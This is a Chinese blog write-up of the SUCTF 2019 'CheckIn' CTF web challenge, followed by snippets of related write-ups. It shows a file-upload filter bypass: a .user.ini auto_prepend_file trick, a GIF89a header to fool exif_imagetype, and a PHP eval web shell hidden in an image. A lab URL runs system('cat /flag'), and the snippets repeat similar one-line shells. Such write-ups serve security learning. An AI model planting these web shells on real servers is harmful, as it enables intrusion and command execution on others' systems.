SUCTF_Checkin

最新推荐文章于 2022-04-17 22:08:12 发布
最新推荐文章于 2022-04-17 22:08:12 发布
阅读量652 收藏 1
点赞数
分类专栏: Web安全 文章标签: CTF SUCTF Web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/sc0fie1d/article/details/102748731
版权

测试后一共有三种回显结果:

  • <? in contents!表示 <?不能连续出现在文件中
  • illegal suffix!表示 不能上传后缀为php、php4、php5、phtml等可直接被解析的PHP文件
  • exif_imagetype:not image表示判断一个图片的类型(即读取一个图像的第一个字节并检查其签名)

解题思路

  • 先上传一个.user.ini文件,.user.ini会将图片马中的代码包含到每个php文件中
  • 再上传一个图片文件(图片中是php一句话木马)

Attention

  • 图片马可以是GET或者POST类型;GET类型直接在URL中传参,POST类型用剑蚁连接即可
  • 图片马的文件名要和.user.ini包含的文件名一致

上传文件的内容如下:

  • 使用GIF89a绕过exif_imagetype判断
  • 使用<script>标签绕过对<?的检测
# .user.ini文件内容如下
GIF89a
auto_prepend_file=123.jpg

# 123.jpg文件内容如下
GIF89a
<script language=php>eval($_GET['cc123']);</script>

解题结果

  • 上传两个文件之后回显文件上传路径
    在这里插入图片描述
  • 这里我们采用GET方式连接,构造URL,注意要在存储路径后面加index.php:
http://127.0.0.1:39001/uploads/5b02a1fb5a263b1ba6b075868c2849fa/index.php?cc123=system("cat /flag");
  • 拿到flag:
    在这里插入图片描述
Alst0n
关注
专栏目录
SUctf checkIn
舞动的獾
10-08 554
看了道上传的关于.user.ini的题目,这里试着做一下 题目地址 buuctf checkln 打开题目,出现了简单的上传框 试着上传php文件 更改名称为phps,php3,php4,php5,Php,pphphp,都上传失败. 试试改为jpg 发现它对<?内容进行了检验。 我们可以构造这种形式的木马 <script language="php"> @eval($_P...
SUCTF web CheckIn
weixin_42499640的博客
08-19 2736
记录一道SUCTFweb1 据菠萝师傅说这是他们出的签到题 我tcl
SUCTF CheckIn
weixin_45751765的博客
08-20 263
0x00前言 a.关于图片马 图片马成功getshell的前提是靶标存在文件包含漏洞,而不是说直接说上传图片马(eg:1.jpg)就行了。你要让它能被服务端解析。 b.关于.user.ini 原文说的非常详细 https://wooyun.js.org/drops/user.ini%E6%96%87%E4%BB%B6%E6%9E%84%E6%88%90%E7%9A%84PHP%E5%90%8E%E9%97%A8.html ...
[SUCTF 2019]CheckIn
热门推荐
沐目的博客
10-22 1万+
一、知识点 1.1exif_imagetype() 打开发现是上传,发现可以上传jpg等格式的文件。然后上传txt格式的文件,发现后台好像是通过exif_imagetype函数判断的— 判断一个图像的类型。 <?php if (exif_imagetype("image.gif") != IMAGETYPE_GIF) { echo "The picture is not a gif"...
BUUCTF_[SUCTF 2019]CheckIn
TenG的博客
05-22 1179
前言 问君能有几多愁?恰似一江春水向东流 先扯些题外话,这个题目是在BUUCTF刷到的,本来以为就是普通的文件上传,但是看了其他师傅的文章以后发现了新姿势,这次利用到的知识点也刷新了我对文件上传类题目的认知,所以特此记录一下。本文也参考了这位大师傅的文章,然后再结合我自己的理解记录下来,当然我的理解还不够透彻,所以还请各位师傅多多指教。 正文 先来看下题目页面 可以看到这就是普通的文件上传页面,开始呢我也是用的以前的常规方法去试的,什么修改MIME类型、图片合成马、00截断啊都试了,但是没有一个能用的。
[SUCTF 2019]CheckIn 1(详解)
qq_52843575的博客
12-12 6189
1.基础检测 进入页面是一个简单文件上传界面,正常上传文件,发现上传空内容的jpg文件显示(exif_imagetype:not image!),可知有内容检测,上传代码文件也发现后缀名过滤 开始抓包操作,因为后缀名验证,伪造文件属性也失效了,与此同时发现“?”被过滤了简单利用 2.解题关键 这道题解题关键在于怎样突破后缀名绕过,就得利用.user.ini文件留后门了 user.ini留后门原理 简单来说,就是利于.user.ini指定文件,在其当前目录下的文件执行时会将你指定的文件中的代码执行出
[SUCTF 2019] web题-CheckIn
BROTHERYY的博客
07-07 543
复现环境:buuoj.cn 尝试了各种上传绕过的方法,但依然还是不行,看了下其他大佬的wp,茅塞顿开,也说明我太菜了。 写入保存将ctf.txt改为ctf.jpg auto_prepend_file 表示在php程序加载应用程序前加载指定的php文件 auto_append_file 表示在php代码执行完毕后加载指定的php文件 自定义的.user,ini先执行auto_prepend_file函数,auto_prepend_file 表示在php程序加载应用程序前加载指定的php文件,也就是先加
SUCTF 2019 CheckIn 作题有感
qq_46184013的博客
04-15 649
一.SUCTF 2019 CheckIn 刚开始打开这道题以为只是一道普通的文件上传, 先是试了试php一句话木马,提示 这里显示 是对<?进行过滤了 这时候想到可以换一种方法,用 <script language='php'>system('cat /flag');</script>对<?进行替换。 但发现还是不行,出现这个界面。 我是小白也不懂这个啊,去...
BUUCTF-CheckIn
m0_47571887的博客
11-09 810
打开题目,貌似是一道考上传的题目 上传php文件被过滤,我们就上传图片马, 我们用.htaccess来进行解析,尝试过后貌似行不通, 这里使用.user.ini .user.ini:在php.ini中的配置项中有两个配置项,一个是auto_append_file和auto_prepend_file,auto_prrpend_file意思是指定一个文件,自动包含在要执行的文件前,类似与在文件前调用了require()函数。而auto_append_file相似,只是在文件后面进行包含,使用方法很简
[SUCTF 2019]CheckIn 1 学习笔记
weixin_45869407的博客
10-15 417
刚刚做到这道题的时候以为就只是一个简答的文件上传,结果发现自己上传的图片马被拦截了,发现不能有<?符合,然后改成,但最后不知道该怎么弄,无奈自己太菜,只能看大佬writeup(做题不是关键) ...
Buuctf [GKCTF2020]CheckIN
CyhDl666的博客
03-19 336
进入网站直接贴了源码 <title>Check_In</title> <?php highlight_file(__FILE__); class ClassName { public $code = null; public $decode = null; function __construct() { $this->code = @$this->x()['Gin.
BUUCTF [SUCTF 2019]CheckIn
qq_42158602的博客
02-07 1601
拿到题进行简单的测试,发现修改content-type和利用特殊扩展名php5、pht等都没有成功 发现添加图片头文件就可以绕过 GIF89a 上传php文件的时候发现过滤了<? 绕过检测 <script language='php'></script> 构造图片马 GIF89a <script language='php'>eval($_GET['...
【BUUCTF】[SUCTF 2019]CheckIn
aoao331198的博客
04-09 503
废话不多讲,老生常谈的文件上传题目 需要传一个图片马 GIF89a <script language='php'>@eval($_POST['abc']);</script> 还有一个.user.ini文件 文件上传之.user.ini GIF89a auto_prepend_file=upload.jpg 作用是指定在主文件之前自动解析的文件的名称,并包含该文件,就像使用require函数调用它一样。 蚁剑链接 http://c8a6d5ca-0f52-4c27-a06f-
BUUCTF WEB [SUCTF 2019]CheckIn
Y1da的博客
04-17 310
BUUCTF WEB [SUCTF 2019]CheckIn .user.ini文件 PHP 支持基于每个目录的 INI 文件配置。 除了主 php.ini 之外,PHP 还会在每个目录下扫描 INI 文件,从被执行的 PHP 文件所在目录开始一直上升到 web 根目录($_SERVER[‘DOCUMENT_ROOT’] 所指定的)。如果被执行的 PHP 文件在 web 根目录之外,则只扫描该目录。 与php.ini不同,.user.ini是一个能被动态加载的ini文件,它实际上是一个可以由用户自定义
BUUCTF:[SUCTF 2019]CheckIn
末初的CSDN博客
11-04 1297
题目地址:https://buuoj.cn/challenges#[SUCTF%202019]CheckIn 上传文件后缀名黑名单机制,常用php及相关可解析扩展名等无法成功上传 使用.user.ini构造后门 user.ini如何构造后门详情见P神:https://www.leavesongs.com/PENETRATION/php-user-ini-backdoor.html 首先制造图片马 图片马不能包含<?,使用 <script language="php">eval($.
解释result = pd.DataFrame({'第一次打卡时间': first_checkin, '最后一次打卡时间': last_checkin})
最新发布
04-04
这行代码使用了pandas库中的DataFrame函数,用于创建一个新的数据框(result)。...每个列的数据来源是先前定义的两个变量(first_checkin和last_checkin)。这行代码的目的是将这些数据整理成一个易于管理和处理的格式。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值